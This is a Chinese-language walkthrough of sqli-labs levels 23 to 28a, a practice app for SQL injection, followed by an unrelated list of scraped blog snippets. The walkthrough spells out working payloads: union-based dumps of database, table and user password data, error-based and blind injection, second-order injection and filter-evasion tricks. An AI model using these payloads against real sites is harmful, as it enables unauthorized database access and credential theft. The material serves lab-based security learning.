婷婷哈

sqli-libs（23-28a关）

Less_23

首先在php文件中加入echo $sql;echo "
";

方法一：；%00

输入?id=1’,报错，说明存在注入漏洞：

输入?id=1' --+，此时无法进行闭合：

在第一关中，我们可以看到可以正常使用闭合，此时我们查阅源代码：（可知，源码对 --+、#进行了过滤，所以这里我们只能使用and或者or语句进行闭合）

依然可以使用另外一种特殊的注释符；%00通过这个注释符可以判断列数：

在url末尾将--+、# 替换为 ;%00 其余的均和less-1关相同，例如查列：

输入?id=1' order by 3;%00：

查找回显位置：?id=-1' union select 1,2,3 ;%00

查库名：/?id=-1‘ union select 1,2, group_concat(schema_name) from information_schema.schemata ;%00

查表名：/?id=-1‘ union select 1,2, group_concat(table_name) from information_schema.tables where table_schema = 0x7365637572697479 ;%00

差字段名：/?id=-1‘ union select 1,2, group_concat(column_name) from information_schema.columns where table_name = 0x7573657273 ;%00

查字段中所有的值：/?id=-1‘ union select 1,2, group_concat(concat_ws(0x7e,username,password)) from security.users ;%00

输入：?id=-1'order by 10 and '1'='1

我们已经知道了这个只有三列，但是回显结果没有报错

我们将上面语句中的and改成or，返回结果仍没有报错

这是由于mysql解析顺序使得order by 在执行时候被忽略了

我们可以用union select的另一种方式来进行查询：

输入：?id=1' union select 1,2,3'

输入：?id=-1' union select 1,2,3' 我们将前面的值报错，使得前面值无法查询，此时在3处进行闭合操作（其中-1可以换成任意一个超出数据库的数值）

查询数据库： ?id=-1‘ union select 1,2,database()’

查询库中信息：?id=-1' union select 1,2,(select group_concat(schema_name) from information_schema.schemata) '

其他操作与上述类似；

Less23方法一总结：

方法二：报错注入

输入： ?id=1' and updatexml(1,concat(0x7e,(database())),1) or '1'='1 爆出数据库

输入： ?id=1' and updatexml(1,concat(0x7e,(select schema_name from information_schema.schemata limit 2,1)),1) or '1'='1 查询所有的数据库，使用limit进行逐个查询。

Less_24

补充知识：二次注入

第24关我们使用二次注入：

查询users表信息，找到admin的密码，密码为admin；

我们用admin’# 注册一个恶意账号，再登录密码为123456

我们修改admin’#的密码密码为111111

用admin 111111结果登录成功

Less24总结

Less_25

首先在PHP文件中添加：echo $sql; echo “
”;

输入?id=1,返回正常：

输入?id=1’ ,报错，存在注入漏洞；

输入?id=1' order by 3--+发现报错，下方提示显示or被过滤；

查看源码，得知or and 都被过滤；

方法一：尝试双写

输入?id=1' oorrder by 3--+，回显正常

输入?id =-1‘ union select 1,2,3--+ 获得回显位置

所有位置的or and 都需要双写

查库：?id=-1' union select 1,2,group_concat(schema_name) from infoorrmation_schema.schemata --+

查表：?id=-1' union select 1,2,group_concat(table_name) from infoorrmation_schema.tables where table_schema=0x7365637572697479 --+

查字段：?id=-1' union select 1,2,group_concat(column_name) from infoorrmation_schema.columns where table_name=0x7573657273--+

查字段中得值： ?id=-1' union select 1,2,group_concat(concat_ws(0x7e,username,passwoorrd)) from security.users--+

方法二：or替换为|| 基于报错的注入

输入： ?id=-1‘ || 1=1--+ 存在注入；

输入： ?id=-1' || updatexml(1,concat(0x7e,(database()),0x7e),1)--+ 查所在数据库；

输入： ?id=-1' || updatexml(1,concat(0x7e,(select schema_name from infoorrmation_schema.schemata limit 0,1),0x7e),1)--+ 查当前所有数据，此时不使用group_concat()，因为数据显示不完整；

Less_25a

Less25a： 没有任何包裹， or and 也需要双写

输入?id=1 回显正常；

输入 ?id=1’ 回显异常，数据消失，存在注入，但是通过$sql语句得知，此处并没有将id值进行包裹；

查有多少列： ?id=1 oorrder by 3--+

查回显位置： ?id=-1 union select 1,2,3--+

查库：?id=-1 union select 1,2,group_concat(schema_name) from infoorrmation_schema.schemata--+

查字段： ?id=-1 union select 1,2,group_concat(column_name) from infoorrmation_schema.columns where table_name=0x7573657273--+

查字段信息： ?id=-1 union select 1,2,group_concat(concat_ws(0x7e,username,passwoorrd)) from security.users--+

基于时间的布尔盲注

输入： ?id=-1 oorr if(length(database())>1,1,sleep(5))--+ 判断数据库的长度；
输入： ?id=-1 oorrif(left(database(),1)>‘a’,1,sleep(5))--+ 判断当前数据库的组成；

输入： ?id=-1 oorr if(left((select schema_name from infoorrmation_schema.schemata limit 0,1),1)>‘a’,1,sleep(5))--+

判断所有的数据库,

然后依次进行下去。

布尔盲注

输入：?id=-1 oorr length(database())>1--+ 回显正常，说明此时数据库长度大于1；

输入：?id=-1 oorr left((select schema_name from infoorrmation_schema.schemata limit 0,1),1)>‘a’--+ 回显正常，说明此时数据库第一个字母大于a；

输入：?id=-1 oorr left((select schema_name from infoorrmation_schema.schemata limit 0,1),1)=‘a’--+，回显异常，说明我们语句是正确的；

然后依次进行下去。

Less25a总结

Less_26

输入： ?id=1 回显正常；

输入： ?id=1’ 出现报错，说明可能存在注入漏洞；

输入： ?id=1’ --+ 显示错误且提示中没有--+ ；

输入： ?id=1’ ;%00 显示正常；

查看源代码可知：所有or and 注释符空格都被替换

输入： ?id=1’ oorr ‘1’=’1 可以正常登陆；（or可以用||替换）

输入： ?id=1’ union select 1,2,3 ;%00 可以发现union select之间没有了空格；

解决办法：

or可以用||替换

and可以用&& 、 %26%26替换

注释符用;%00替代

空格用%a0替代

采用注入报错：

查库：?id=1‘ || updatexml(1, concat(0x7e, ( database() ) ),1) || ’1‘=‘1

查表：

?id=1‘||updatexml(1,concat(0x7e,(select(group_concat(table_name))from(infoorrmation_schema.tables) where (table_schema = 0x7365637572697479) ) ),1) || ’1‘=‘1

查字段：

?id=1‘||updatexml(1,concat(0x7e,(select(group_concat(column_name))from(infoorrmation_schema.columns) where (table_name = 0x7573657273) ) ),1) || ’1‘=‘1

查字段中的值：

?id=1‘ || updatexml(1, concat(0x7e, ( select (group_concat(concat_ws(0x7e,username,passwoorrd))) from (security.users) ) ),1) || ’1‘=‘1 （不完整）

改变id的值可以查看所有的数据：

?id=1‘ || updatexml(1, concat(0x7e, ( select (group_concat(concat_ws(0x7e,username,passwoorrd))) from (security.users) where (id=3) ) ) ,1) || ’1‘=‘1

使用union select 时要使用%a0来代替空格注释符用;%00 或者 ||’1’=’1

Less_26a

id=('1')包裹

输入?id=1 回显正常；

输入 ?id=1’ 回显错误；

查看源代码：可以看到和26关一样，将这些符号过滤；

看源码可知，26a将错误不进行打印，所以此关不能使用注入报错；

我们使用union select将空格都用%a0替代进行操作即可：

查有多少列：?id=1') %a0 oorrder %a0 by %a0 3 ;%00

查看回显位置：?id=111') %a0 union %a0 select %a0 1,2,3 ;%00

后面操作和前面操作类似。

Less_27

输入?id=1 回显正常;

输入?id=1’ 回显错误；

输入?id=1’ ;%00 回显正常；

查看源码，发现select union 注释符空格也都被注释了；

方法一：大小写混写

因为union select 规矩的都是全是大写或者全是小写，那我们尝试大小写混合写；

输入 ?id=111' %a0 uNion %a0 sElect %a0 1, 2, 3 ;%00 查回显位置；

输入 ?id=111' %a0 uNion %a0 sElect %a0 1, 2,group_concat(schema_name) %a0 from %a0 information_schema.schemata ;%00 查库；

其他和前面类似。

方法二：使用报错注入

输入：?id=1' %a0 || %a0 updatexml(1, concat(0x7e, ( database() ) ), 1) %a0 || '1'='1 查库

其他操作和26关类似。

方法三：基于时间的盲注； %26%26替代&& 即and

输入：?id=1' %26%26 if( length(database())>1, 1, sleep(5) ) %26%26 %0a '1'='1

注意：在句子后面不能使用or，因为使用or的情况下，无论如何情况返回都会为真

输入：?id=1' %26%26 if( length(database())=5, 1, sleep(5) ) || %0a '1'='1

Less_27a

less27a使用””包裹

其他与第27关类似。

Less_28

Less-28：使用（’’）包裹

输入 ?id=1 回显正常

输入 ?id=1’) --+ 回显错误；

输入 ?id=1’) ;%00 回显正常；

查看源码，发现union select联合查询空格注释符也都被过滤；

方法一：用%a0代替空格

输入 ?id=1') %a0 order %a0 by %a0 3;%00 查看有多少列；

输入：?id=1111') %a0 union %a0 select %a0 1,2,3 ;%00 查看回显位置；

也可以输入：?id=1111') %a0 union %a0 select %a0 1,2,3 || （‘1’）=(‘1 查看回显位置； 即;%00可替换为|| （‘1’）=(‘1

输入 ?id=1111') %a0 union %a0 select %a0 1,2,group_concat(1,database(),1) ;%00 得到数据库

后面查询操作和前面类似。

方法二：基于时间的盲注

输入 ?id=1') %a0 %26%26 if( length(database())>8, 1, sleep(5)) ;%00

输入：?id=1') %a0 %26%26 if( length(database())>1, 1, sleep(5)) ;%00

其他操作和前面类似。

Less_28a

Less-28a:使用(‘’)包裹

查看源码：

此关没有过滤空格注释符，其他语句和关类似。

你可能感兴趣的:(sqli-libs（23-28a关）)

主题升华随机抽总结木棉咕噜
昨天晚上在火山灿教练那里抽了主题升华最后一关。一共抽了两个故事，现总结如下。第一个故事是《并不是你想象的那样》。主题一：有时候，面对别人一些貌似不合常情的行为，不要轻易的指责他，也许背后有我们所不知道的原因。在这一个主题里面，刚开始的时候，我没有加上貌似二字。所以就没有改动之后这么精准。主题二：有时候我们对他人善意的行为，可能会给我们带来一些意外的回报。主题三：面对同样一件事，因为不同的人看待问题
组诗·三国群英颂（周瑜、马超、贾诩、赵云）颍川荀清
念奴娇·怀周郎矶头万仞、若关情，仍叹当年英物！一揽长江，龙流怒，化作孙吴阵壁。浪里船城，铁锁平川，袖挽千堆雪。烈胆豪情，斗牛惊认奇杰！但看戎马余生，纵横万里，正英姿勃发。宏图霸业弹指间，惟见涛生云灭。苍天轻狂，妒意猖作，帅将难华发。难忆郎顾，青史相伴别月。古体·西凉天将军大漠狂烟起，孑然佩青锋。神威震羌月，锦袍曜汉空。终囚蜀山险，瘴疠掩长虹。天地一孤啸，匹马又西风。水调歌头·文和乱武山水应将残，清
Python实现关联规则推荐这孩子谁懂哈 Python Machine Learning python 关联规则机器学习
1.什么关联规则关联规则（AssociationRules）是反映一个事物与其他事物之间的相互依存性和关联性，如果两个或多个事物之间存在一定的关联关系，那么，其中一个事物就能通过其他事物预测到。关联规则是数据挖掘的一个重要技术，用于从大量数据中挖掘出有价值的数据项之间的相关关系。关联规则挖掘的最经典的例子就是沃尔玛的啤酒与尿布的故事，通过对超市购物篮数据进行分析，即顾客放入购物篮中不同商品之间的关
天下云逸1108
00云逸109901336刚刚桃红柳绿千家乐，山青水秀万民安。农工商服百业竞，高铁专列十国连。北京坐控九州稳，南宁繁华友谊关，东海巨舰巡宝岛，西疆戈壁大油田编辑
‌汽车一键式启动系统‌包含哪些功能 zsmydz888 汽车一键式启动系统‌汽车无钥匙启动系统汽车
‌汽车一键式启动系统‌是一种智能化的汽车启动系统，它通过一个按钮来启动和熄灭发动机，取代了传统的钥匙启动方式。这个系统不仅简化了启动和熄火的步骤，还提供了多种智能化的功能，如自动开锁、自动关锁、自动关窗、自动防盗等。此外，汽车一键式启动系统还支持远程启动和紧急熄火功能，以及个性化设置记忆功能，大大提升了驾驶的便利性和安全性。‌移动管家汽车无钥匙进入一键启动基本功能‌：‌一键启动与熄火‌：通过轻按按
今日备忘之星期六星期天教育行走林
——这两天干了点啥（二)为了防止落下一项工作，每天都要提前写一个今日备忘，然后晚上查一查，看看有没有落下一项工作没干，俗话说得好“好记性不如烂笔头”。周六周日比平常工作也不少，这两天干了点啥呢，先说周六吧：早自习在八五班上历史，同学们整体背书状态还不错，下课前进行了表扬；上午第一节课在后面办公室盯着给学校伙房送米、面、油、肉、蔬菜的等小贩过秤、开票，严格把好常规食品原料采购关；上午第二节课拿着宿舍
两岁娃不会数数？正常！帮娃跨越数字关，点数识数量数对应都要会说书人熊二娘
前几天，我遇到一个很久不见的年长朋友。他向我吐槽自己的孙子不会数数。他对我说自己有一天拿出了道具，让小孙子学数。两岁多的小孙子看了看那些道具，对他说：“爷爷，我们今天还是算了吧。”两岁多的孩子学数的确是早了一点。孩子的认知水平没有到，学起东西来就会异常困难。等过了一段时间，他认知和理解力达到了学数的程度，分分钟就能搞定这些问题。我儿子3岁7个月，最近突然能够数到100，玩起百数板也非常开心。我偶尔
转班遇上星期六凝结的海
晚上上班的时候，我感觉有点饿，就在十点五左右去食堂，看看有没有什么吃的，一路上同事们都在说可能已经关门了，走快一点或许能碰得到。庆幸的是我到了他还没来得及关，我买了一个粽子和一个咸鸭蛋，总共花了四块三，总感觉比外面卖的要贵的多。后来我在三点多近四点的时候，我和三号前化料的一起去保安室拉了一大车水，我们装好之后，我让他先拉到我的岗位上，我去拉点原材料。他把水拉走之后我就出去把充电动车的电拔掉，又到路
休息了两天，明天继续加油田木习习
姑且不去管结果了，继续按部就班的准备。放松了两天，精神好多了。有的事，看开真的很重要。准备给栩断奶了。最近她不爱吃饭，整个人瘦了一圈，每天就靠着母乳不上不下的。再这样下去，小丫头要瘦没了。买了奶粉，准备狠狠心，开始断奶，这样自己也能轻松很多。这个过程估计不会很容易，努力吧，总要熬过这一关。最近真的很热，晚上睡觉空调开到24也不觉得凉快。明天开始吃课本，为可能没有的下一步做准备，加油，尽人事听天命！
2023-06-09（周五）独品弦意
（18°-33°，晴间多云）一个人如果20岁而不美丽、30岁而不健壮、40岁而不富有、50岁而不聪明，就永远失去这些了。（刘墉）老公说今天很轻松，可以陪我。可是我们俩合计半天都不知该干什么去，他的脚只是恢复了9成，不能多走，而我的脸也只恢复8成，不愿意拍照，也不想逛街、不想看电影，于是又只好按部就班，他理发，我修指甲，洗车，下午陪爸妈打麻将。家门口的家乐福今天关店。开了24年的家乐福，曾经盛极一时
天性如地球引力一般，促使你按着既定轨道前行寒蝉萋萋
生活总是这样，不能叫人处处都满意。但我们还要热情地活下去。人活一生，值得爱的东西很多，不要因为一个不满意，就灰心。——路遥《人生》赚钱不难，赚足够的钱却很难；坚持不难，坚持不懈却特别难；追梦不难，一直追梦却实属不易。世上的事情本来并不难，有些人闯到了最后一关，打到了终极boss，有些人卡在即将胜利的某一段，迟迟无法突破，时间战线拖得过于长，你全部的耐心已然用尽，把它丢在一边，不管不顾，由着之前的成
今日头条写文章容易赚钱吗？写文章收益如何计算的？氧惠导师
在现在这个社会，想要赚钱其实很容易，赚钱的渠道也特别多。如果你喜欢写文章，并擅长某个领域的创作，可以去今日头条写文章赚钱。不过，这个平台好不好赚钱呢?➤推荐网购薅羊毛app“氧惠”，一个领隐藏优惠券+现金返利的平台。氧惠只提供领券返利链接，下单全程都在淘宝、京东、拼多多等原平台，更支持抖音、快手电商、外卖红包返利等。（应用市场搜“氧惠”下载，邀请码:521521，全网优惠上氧惠！）➤由于信息差的关
《幸福的勇气》摘录其一小悯丶
推荐序一、1、在很多人印象里，幸福是一件慵懒的事，就好像学佛是一件随性的事一样。然而恰恰相反，古人说，学佛乃大丈夫事！……真正的修行，首先是放下对恒常的追求，坦然接受无常的发生。这种勇气，没有足够的智慧和福德，是难以拥有的。2、幸福也是一样。如果你所理解的幸福就是什么不开心的事都尽量不发生，平安喜乐地过一辈子，那么多半你是要失望了。3、要选择爱，首先要过伤害这一关。明明遭遇过伤害，却要报之以琼瑶。
2021.12.21 科技新闻 | 生活很慢，世界很快【豌豆姑娘整理】豌豆壳外
2021.12.21科技新闻|生活很慢，世界很快【豌豆姑娘整理】1、薇娅偷逃税重罚13.41亿元，社交直播均被F号风暴中的雪梨：F号关店，买地建楼暂停，融资上市搁浅，直播公司已就地解散今年缴税110亿美元，马斯克或将成为美国史上最大纳税人2、胡润2021全球独角兽榜：字节跳动以2.25万亿估值跃升榜首（蚂蚁第二，SpaceX第三）TikTok计划在美国推出外卖餐厅，专做网红美食3、商汤重启招股，将
如何把文案变成“印钞机” 西亚西
把文案变成印钞机，这是《爆款文案》作者关键明老师一直在做的事情。他是前奥美金牌广告人，他写出了走心文案的一套系统和4大步骤。让每一个想学文案的人都能够从中获益。大家称关键明老师为文案圈的神级人物，知道关老师的人就知道，这个夸奖并不夸张。但是关老师为什么有现在如此高的成就？相信很多人想知道答案。首先关老师非常非常的利他。我现在链接到的很多人，其实都是从关老师那里知道。苏北老师，阿糖，安迪，还有许多同
暑天怎么过王木木_0311
图片发自App不知不觉，原来大暑已至。孩子身上起了热痱，晚上热了有点痒，还有点粘人，但是好像被我抱着就能止痒……乖乖的洗澡，抹上药膏，还要躺在我怀里，一点不嫌热。孩子身体不舒服的时候，总会特别粘人，需要得到更多的关爱。感觉妈妈的怀抱，比吃药还要管用。今天计划学习的事情，都没做完，就看了一点书。午饭后，一个饱饱的午觉睡的心满意足。本来不打算睡的，二十分钟的课，刚听了不到十分钟就睡着了，还是老公给我关
李煜和纳兰性德的长相诗吉吉多吉
《长相思》李煜一重山，两重山，山远天高烟水寒，相思枫叶丹。菊花开，菊花残，塞雁高飞人未还，一帘风月闲。《长相思》纳兰性德山一程，水一程，身向榆关那畔行，夜深千帐灯。风一更，雪一更，聒碎乡心梦不成，故园无此声。两首长相思，各有韵味。一重又一重，重重叠叠的山啊。山远天高，烟云水气又冷又寒，可我的思念像火焰般的枫叶那样。菊花开了又落了，时令交替轮换。塞北的大雁在高空振翅南飞，可是思念的人却还没有回来。只
直播带货，产业互联网的前奏曲孟永辉
文/孟永辉江南的雨淅淅沥沥地下了一个月的时间，这场雨在带来了降温的同时，还给人们的生产和生活带来了很多的难题。于是，我开始思考，任何一个事物存在的意义以及如何最大限度地去发挥这样一种意义。任何一个事物都必然要遵循它的内在的规律，一旦超过了某种限度，便会给人们带来灾难。风靡一时的直播带货同样如此。开年之后，我们便看到了一场以直播带货为肇始点的新经济浪潮，被线下的关店潮深刻影响着的商家们在直播带货上看
2018-06-14 351a0809b14d
打卡内容：日精进打卡姓名：张涛部门岗位:进口部【日精进打卡第74天】【知~学习】读:大学，六项精进读了凡四训【行~实践】一、修身走路一万多步二、齐家和家人公园散步三、建功（对工作每日六点）1.今日总结按照计划完成了工作。今天处理了很多客户咨询。进口日用品的客户清关完毕送货。2.明日计划按照计划完成工作。下午去见客户。四,积善给人让位。【省~觉悟】播种令他人快乐的种子，自己也能收获开心。【感谢】感谢
HBase（一）——HBase介绍 weixin_30595035 大数据数据库数据结构与算法
HBase介绍1、关系型数据库与非关系型数据库（1）关系型数据库关系型数据库最典型的数据机构是表，由二维表及其之间的联系所组成的一个数据组织优点：1、易于维护：都是使用表结构，格式一致2、使用方便：SQL语言通用，可用于复杂查询3、复杂操作：支持SQL，可用于一个表以及多个表之间非常复杂的查询缺点：1、读写性能比较差，尤其是海量数据的高效率读写2、固定的表结构，灵活度稍欠3、高并发读写需求，传统关
数据结构，有头链表 (笑)z 数据结构
数据结构基本概念：1.定义一组用来保存一种或者多种特定关系的数据的集合（组织和存储数据）程序的设计：将现实中大量而复杂的问题以特定的数据类型和特定的存储结构存储在内存中，并在此基础上实现某个特定的功能的操作；程序=数据结构+算法2.数据与数据之间的关系数据的逻辑结构：数据元素与元素之间的关系集合：关系平等线性结构：元素之间一对一的关系（表（数组，链表），队列。栈。。。）树型结构：元素之间一对多的关
你的九岁孩子大王中的王
我是春蕾一幼尚丽娜，今天阅读打卡第8天，我阅读的是《你的九岁孩子》142—185页，今天的阅读收获是：一、九岁孩子的情绪宣泄，九岁年龄的孩子和八岁孩子时候相比，对宣泄紧张的情绪需要的减少了很多，而对宣泄紧张的强烈程度也减少了不少，有时候遇到糟糕的事情回忆嘟囔、吼叫、生闷气的一些做法来宣泄他们的苦恼。而这些情况在我家宝贝的身上都出现过。二、九岁孩子的关教方法，任何形式的关教都可能涉及到一定程度的惩罚
周检视会议策划运营I周长胜
大家早上好，我是主持人火英。在等小组火什二伴进来之前放点音乐，再等一会其他的小伙伴。大大家都到了，大家帮忙去叫上自己的死党。马俊，小凤海燕到了那会场会议吗开始办吧？喂有声音吗？是有理发系的会议室吧稍微没有。是可以关一下音乐了，呀我因为。觉得好像人还不够啊。那行那在放。对，主要工作人员都还没到期，呢。可以。陈还是张科对吧？他不用记录，吧不记得了。啊就就啊它记录，我帮她小记一下，吧他不发了一个，个然后
《关山月》风曦燃月
《关山月》这首诗是李白青年时期“仗剑去国，辞亲远游”时写下的。李白作为一名有“诗仙”之称的浪漫主义诗人，写诗都是自带“仙气”的，就比如说《关山月》这首诗中的“明月出天山，苍茫云海间”这句诗写出了月出时缥缈云海之感。《关山月》这分明是一首边塞题材的诗，却硬是被李白大诗人写出了“仙人视角”之感，先来整体的欣赏一下这首诗：明月出天山，苍茫云海间。长风几万里，吹度玉门关。汉下白登道，胡窥青海湾。由来征战地
【小说连载】花溪入海第一百八十一章安妮wang
文/花随裙裾第二天慕耶溪还未出门，就收到关燕西的花，花里还夹着一张留言条，字体瘦长有骨骼优点宋瘦金体的意思。小溪：今天是我追求你的第一天，一朵玫瑰就是一句我喜欢。九十九朵就是我久久地喜欢你。海慕耶溪无奈地接过花，看着还带着露水的鲜花，实在不忍心浪费扔掉，找了一个玻璃花瓶给插上了。慕耶溪将纸条放进手提包里赶着出门，刷上门禁卡时是整九点，通行的滴滴声格外响。。门口保安和大厅里的同事都看向公司入口处的慕
《哪吒之魔童降世》：我命由我不由天司马蓝衫
文/宸宸三年级暑假2019.7.28今天我和爸爸去明星电影院观看《哪吒之魔童降世》。我一年级时曾经看过一部动画片叫《我是哪吒》，我原以为这部电影也差不多。然而进了电影院，我就被小哪吒吸引住了。因为申公豹的掉包，哪吒被魔丸附身，他一生下来就很坏，到处搞破坏。可是实际上小哪吒只是想要引起父母的注意，想要和朋友一起玩。让我记忆最深刻的是，尽管哪吒被大家冤枉成妖怪，但他还是不顾危险努力去拯救陈塘关，最后他
亲人之间的爱 123重新看见
这几天抽时间刷都挺好，演的确实好啊，我对好的概念就是让人看了一眼就不由自主不想换台，不想关手机能继续看下去，让你不停的追剧，没事就在想里面的人物剧情，这是演的非常好了，这部剧就是后者。这几年原生家庭这个词很火，但这么赤裸裸的把重男轻女，自私自利，原生家庭对孩子造成不同的影响，这些不那么正能量的话题以电视剧的形式播出还真是不多见，刚开始苏明玉妈妈去世了，我们看到的是一个冷漠无情的女儿，一滴眼泪没留，
寒夜一度一
图片发自App夜白寂无声。雪化滴滴响声冷。披衣视窗未关稳，寒侵。灰白暗影伴雾雨。今夜应冰凝。房中花草低首梦。屋外鸟雀息我顶，关心。起看楼顶黑白清。
萱萱：为人子女者要切记，看父母就是看自己的未来巧克茶
如果有一天，你发现父亲的花草树木已渐荒废，如果有一天，你发现家中的地板衣柜经常沾满灰尘；如果有一天，你发现母亲煮的菜太咸太难吃，如果有一天，你发现父母经常忘记关瓦斯；如果有一天，你发现老父老母的一些习惯不再是习惯时，就像他们不再想要天天洗澡时；如果有一天，你发现父母不再爱吃青脆的蔬果，如果有一天，你发现父母爱吃煮得烂烂的菜；如果有一天，你发现吃饭时间他们老是咳个不停，千万别误以为他们感冒或着凉(那
来尝尝这碗毒鸡汤，如何? 佛祖说
图片发自App1.你以为有钱人很快乐吗?他们的快乐你根本想象不到！2.时间真的能改变一个人，比如你以前丑，现在更丑。33.条条大路通罗马，而有些人就住在罗马。4.你只看到别人在表面上活得春风得意，却不知道人家在背后也过得也风生水起。5.人生就像一杯水，孤独，孤独，孤独，一辈子就完了。6.别灰心，人生就是这样起起落落落落落落落落落落落的。7.长得丑就是病，不然为什么整形医院叫医院。8.熟练的用运“关
windows下源码安装golang 616050468 golang安装 golang环境 windows
系统： 64位win7，开发环境：sublime text 2， go版本： 1.4.1 1. 安装前准备(gcc, gdb, git) golang在64位系
redis批量删除带空格的key bylijinnan redis
redis批量删除的通常做法： redis-cli keys "blacklist*" | xargs redis-cli del 上面的命令在key的前后没有空格时是可以的，但有空格就不行了： $redis-cli keys "blacklist*" 1) "blacklist:12: [email protected]
oracle正则表达式的用法 0624chenhong oracle 正则表达式
方括号表达示方括号表达式描述 [[:alnum:]] 字母和数字混合的字符 [[:alpha:]] 字母字符 [[:cntrl:]] 控制字符 [[:digit:]] 数字字符 [[:graph:]] 图像字符 [[:lower:]] 小写字母字符 [[:print:]] 打印字符 [[:punct：]] 标点符号字符 [[:space:]]
2048源码(核心算法有，缺少几个anctionbar，以后补上) 不懂事的小屁孩 2048
2048游戏基本上有四部分组成， 1：主activity，包含游戏块的16个方格，上面统计分数的模块 2：底下的gridview，监听上下左右的滑动，进行事件处理， 3：每一个卡片，里面的内容很简单，只有一个text，记录显示的数字 4：Actionbar，是游戏用重新开始，设置等功能(这个在底下可以下载的代码里面还没有实现) 写代码的流程 1：设计游戏的布局，基本是两块，上面是分
jquery内部链式调用机理换个号韩国红果果 JavaScript jquery
只需要在调用该对象合适(比如下列的setStyles)的方法后让该方法返回该对象（通过this 因为一旦一个函数称为一个对象方法的话那么在这个方法内部this（结合下面的setStyles）指向这个对象） function create(type){ var element=document.createElement(type); //this=element;
你订酒店时的每一次点击背后都是NoSQL和云计算蓝儿唯美 NoSQL
全球最大的在线旅游公司Expedia旗下的酒店预订公司，它运营着89个网站，跨越68个国家，三年前开始实验公有云，以求让客户在预订网站上查询假期酒店时得到更快的信息获取体验。云端本身是用于驱动网站的部分小功能的，如搜索框的自动推荐功能，还能保证处理Hotels.com服务的季节性需求高峰整体储能。 Hotels.com的首席技术官Thierry Bedos上个月在伦敦参加“2015 Clou
java笔记1 a-john java
1，面向对象程序设计（Object-oriented Propramming，OOP）：java就是一种面向对象程序设计。 2，对象：我们将问题空间中的元素及其在解空间中的表示称为“对象”。简单来说，对象是某个类型的实例。比如狗是一个类型，哈士奇可以是狗的一个实例，也就是对象。 3，面向对象程序设计方式的特性： 3.1 万物皆为对象。
C语言 sizeof和strlen之间的那些事 C/C++软件开发求职面试题必备考点（一） aijuans C/C++求职面试必备考点
找工作在即，以后决定每天至少写一个知识点，主要是记录，逼迫自己动手、总结加深印象。当然如果能有一言半语让他人收益，后学幸运之至也。如有错误，还希望大家帮忙指出来。感激不尽。后学保证每个写出来的结果都是自己在电脑上亲自跑过的，咱人笨，以前学的也半吊子。很多时候只能靠运行出来的结果再反过来
程序员写代码时就不要管需求了吗？ asia007 程序员不能一味跟需求走
编程也有2年了，刚开始不懂的什么都跟需求走，需求是怎样就用代码实现就行，也不管这个需求是否合理，是否为较好的用户体验。当然刚开始编程都会这样，但是如果有了2年以上的工作经验的程序员只知道一味写代码，而不在写的过程中思考一下这个需求是否合理，那么，我想这个程序员就只能一辈写敲敲代码了。我的技术不是很好，但是就不代
Activity的四种启动模式百合不是茶 android 栈模式启动 Activity的标准模式启动栈顶模式启动单例模式启动
android界面的操作就是很多个activity之间的切换,启动模式决定启动的activity的生命周期 ; 启动模式xml中配置 <activity android:name=".MainActivity" android:launchMode="standard&quo
Spring中@Autowired标签与@Resource标签的区别 bijian1013 java spring @Resource @Autowired @Qualifier
Spring不但支持自己定义的@Autowired注解，还支持由JSR-250规范定义的几个注解，如：@Resource、 @PostConstruct及@PreDestroy。 1. @Autowired @Autowired是Spring 提供的，需导入 Package:org.springframewo
Changes Between SOAP 1.1 and SOAP 1.2 sunjing Changes Enable SOAP 1.1 SOAP 1.2
JAX-WS SOAP Version 1.2 Part 0: Primer (Second Edition) SOAP Version 1.2 Part 1: Messaging Framework (Second Edition) SOAP Version 1.2 Part 2: Adjuncts (Second Edition) Which style of WSDL
【Hadoop二】Hadoop常用命令 bit1129 hadoop
以Hadoop运行Hadoop自带的wordcount为例， hadoop脚本位于/home/hadoop/hadoop-2.5.2/bin/hadoop，需要说明的是，这些命令的使用必须在Hadoop已经运行的情况下才能执行 Hadoop HDFS相关命令 hadoop fs -ls 列出HDFS文件系统的第一级文件和第一级
java异常处理（初级）白糖_ java DAO spring 虚拟机 Ajax
从学习到现在从事java开发一年多了，个人觉得对java只了解皮毛，很多东西都是用到再去慢慢学习，编程真的是一项艺术，要完成一段好的代码，需要懂得很多。最近项目经理让我负责一个组件开发，框架都由自己搭建，最让我头疼的是异常处理，我看了一些网上的源码，发现他们对异常的处理不是很重视，研究了很久都没有找到很好的解决方案。后来有幸看到一个200W美元的项目部分源码，通过他们对异常处理的解决方案，我终
记录整理-工作问题 braveCS 工作
1）那位同学还是CSV文件默认Excel打开看不到全部结果。以为是没写进去。同学甲说文件应该不分大小。后来log一下原来是有写进去。只是Excel有行数限制。那位同学进步好快啊。 2）今天同学说写文件的时候提示jvm的内存溢出。我马上反应说那就改一下jvm的内存大小。同学说改用分批处理了。果然想问题还是有局限性。改jvm内存大小只能暂时地解决问题，以后要是写更大的文件还是得改内存。想问题要长远啊
org.apache.tools.zip实现文件的压缩和解压，支持中文 bylijinnan apache
刚开始用java.util.Zip，发现不支持中文（网上有修改的方法，但比较麻烦）后改用org.apache.tools.zip org.apache.tools.zip的使用网上有更简单的例子下面的程序根据实际需求，实现了压缩指定目录下指定文件的方法 import java.io.BufferedReader; import java.io.BufferedWrit
读书笔记-4 chengxuyuancsdn 读书笔记
1、JSTL 核心标签库标签 2、避免SQL注入 3、字符串逆转方法 4、字符串比较compareTo 5、字符串替换replace 6、分拆字符串 1、JSTL 核心标签库标签共有13个，学习资料：http://www.cnblogs.com/lihuiyy/archive/2012/02/24/2366806.html 功能上分为4类： (1)表达式控制标签：out
[物理与电子]半导体教材的一个小问题 comsci 问题
各种模拟电子和数字电子教材中都有这个词汇-空穴书中对这个词汇的解释是; 当电子脱离共价键的束缚成为自由电子之后,共价键中就留下一个空位,这个空位叫做空穴我现在回过头翻大学时候的教材,觉得这个
Flashback Database --闪回数据库 daizj oracle 闪回数据库
Flashback 技术是以Undo segment中的内容为基础的，因此受限于UNDO_RETENTON参数。要使用flashback 的特性，必须启用自动撤销管理表空间。在Oracle 10g中， Flash back家族分为以下成员： Flashback Database， Flashback Drop，Flashback Query(分Flashback Query,Flashbac
简单排序:插入排序 dieslrae 插入排序
public void insertSort(int[] array){ int temp; for(int i=1;i<array.length;i++){ temp = array[i]; for(int k=i-1;k>=0;k--)
C语言学习六指针小示例、一维数组名含义，定义一个函数输出数组的内容 dcj3sjt126com c
# include <stdio.h> int main(void) { int * p; //等价于 int *p 也等价于 int* p; int i = 5; char ch = 'A'; //p = 5; //error //p = &ch; //error //p = ch; //error p = &i; //
